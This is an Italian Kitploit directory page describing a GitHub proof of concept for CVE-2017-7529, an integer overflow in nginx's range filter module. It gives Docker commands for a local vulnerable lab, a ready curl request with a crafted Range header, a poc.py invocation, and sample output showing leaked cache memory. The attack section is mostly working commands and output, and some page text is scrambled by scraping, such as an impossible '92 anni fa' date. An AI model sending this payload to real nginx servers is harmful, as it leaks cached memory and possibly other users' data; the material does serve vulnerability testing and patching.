Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-7529 — Nginx (ver. 0.5.6 - 1.13.2) Integer Overflow remoto | Kitploit
Strumenti/GitHubGitHub/sireagie/cve-2017-7529
Analisi delle VulnerabilitàExploitSicurezza Web
GitHubsireagie/cve-2017-7529

CVE-2017-7529

Nginx (ver. 0.5.6 - 1.13.2) Integer Overflow remoto

Vedi Repository
92 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Descrizione di CVE-2017-7529

Le versioni di Nginx dalla 0.5.6 fino alla 1.13.2 inclusa presentano una vulnerabilità di integer overflow nel modulo range filter di nginx, che comporta la divulgazione di informazioni potenzialmente sensibili in seguito a una richiesta appositamente costruita. Fonte: https://nvd.nist.gov/vuln/detail/CVE-2017-7529

Esempio con Nginx + Flask

In altre fonti open source puoi trovare informazioni secondo cui questa vulnerabilità può essere riprodotta solo con Apache2 e solo con file immagine, ma non è così. Questa vulnerabilità funziona con qualsiasi applicazione proxata tramite Nginx. L'importante è che il server restituisca l'header Accept-Ranges: bytes. Può essere aggiunto manualmente alla configurazione di nginx: proxy_force_ranges on;

Installazione

root@kitploit:~
$ git clone https://github.com/SirEagIe/CVE-2017-7529
$ cd CVE-2017-7529
$ docker build -t cve-2017-7529 .
$ docker run --rm -d -p 8000:80 --name cve-2017-7529 cve-2017-7529

Exploit

Invia una richiesta GET per ottenere il Content-Length e memorizza la risposta nella cache. Reinvia la richiesta con l'header Range e l'intervallo .

Scarica lo strumento
-n,-(0x8000000000000000-n)
root@kitploit:~
$ curl -i http://localhost:8000/
$ curl -i http://localhost:8000/ -r -533,-9223372036854775275 --output -

Oppure usa lo script poc.py.

root@kitploit:~
$ python3 poc.py http://localhost:8000/ 513

Risultato:

root@kitploit:~
[+] Vulnerable to CVE-2017-7529

--00000000000000000029
Content-Type: text/html; charset=utf-8
Content-Range: bytes -513-19/20

MX*fÿÿÿÿÿÿÿÿõU*fTêû©h
KEY: httpGETlocalhost/
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 20
Server: Werkzeug/1.0.1 Python/3.5.3
Date: Thu, 25 Apr 2024 13:09:09 GMT

<p>Hello, World!</p>
--00000000000000000029
Content-Type: text/html; charset=utf-8
Content-Range: bytes -9223372036854775255-19/20